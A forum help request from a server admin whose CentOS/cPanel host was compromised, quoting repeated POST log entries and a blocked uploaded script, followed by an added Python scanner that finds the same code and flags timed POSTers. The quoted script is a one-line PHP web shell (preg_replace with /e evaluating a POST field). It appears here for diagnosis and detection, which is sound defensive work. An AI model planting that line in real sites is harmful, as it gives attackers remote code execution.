Jessie594

Server has been hacked. CXS cleaned it up but hackers keep uploading scripts

@Jessie594

Posted in: #Apache #Centos #Php

On CentOS x64 / Apache / WHM / cPanel

When I look in my apache_logs I see THOUSANDS of these types of LOGS. Various days, always a different IP, over and over and over. What are they trying to do? Are they using an exploit of some sort? I have root access, so I can search for things if someone has an idea.

24.159.0.128 - - [19/May/2017:05:30:52 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:32:52 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:34:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:36:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:38:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:40:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"


Also, in one of their uploaded hack scripts that CXS blocked, I see this:

EEC4D8E4439299046B8CDB3F782<?php @preg_replace ("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>


Is there something I can search for? Any help would be appreciated!
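
The following Python is an added example, not part of the original post and not CXS's own logic. It searches a directory tree for the construct in the blocked script, `preg_replace` with the `/e` modifier (which evaluates the replacement string as PHP code) taking a request superglobal, and reports clients in an access log that POST to `/` on a near-fixed timer. The function names, thresholds, size limit and the one benign log line are assumptions made for this example.

```python
import re
from collections import defaultdict
from datetime import datetime
from pathlib import Path
from statistics import pstdev

# preg_replace() with the /e (evaluate replacement) modifier and a request
# superglobal among its arguments: the construct in the blocked script.
EVAL_BACKDOOR = re.compile(
    r"""(?i:preg_replace)\s*\(\s*(['"])[^'"]*[^A-Za-z0-9\s\\][A-Za-z]*e[A-Za-z]*\1"""
    r"""\s*,[^;]*\$_(?:POST|GET|REQUEST|COOKIE)""")

# Apache combined log format: client, timestamp, method, path.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)')


def scan_tree(root):
    """Return paths under root whose content matches EVAL_BACKDOOR."""
    hits = []
    for path in Path(root).rglob("*"):  # any extension: dropped files are not always *.php
        if path.is_file() and path.stat().st_size <= 2_000_000:  # assumed size limit
            if EVAL_BACKDOOR.search(path.read_text(errors="replace")):
                hits.append(str(path))
    return sorted(hits)


def periodic_posters(lines, min_hits=5, max_jitter=5.0):
    """Map client IP -> mean gap (seconds) for clients POSTing to "/" on a near-fixed timer."""
    seen = defaultdict(list)
    for line in lines:
        m = LOG_LINE.match(line)
        if m and m.group(3) == "POST" and m.group(4) == "/":
            seen[m.group(1)].append(datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z"))
    result = {}
    for ip, stamps in seen.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        # Flag only clients with enough hits and nearly constant spacing.
        if len(stamps) >= min_hits and pstdev(gaps) <= max_jitter:
            result[ip] = sum(gaps) / len(gaps)
    return result


# Sample input: the six timestamps from the post, plus one constructed benign request.
SAMPLE_LOG = [f'24.159.0.128 - - [19/May/2017:05:{t} +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0"'
              for t in ("30:52", "32:52", "34:53", "36:53", "38:53", "40:53")]
SAMPLE_LOG.append('198.51.100.7 - - [19/May/2017:05:31:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"')

if __name__ == "__main__":
    print(periodic_posters(SAMPLE_LOG))
```

A match from `scan_tree` is a lead for manual review rather than proof, and obfuscated variants of the construct will not match this pattern.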
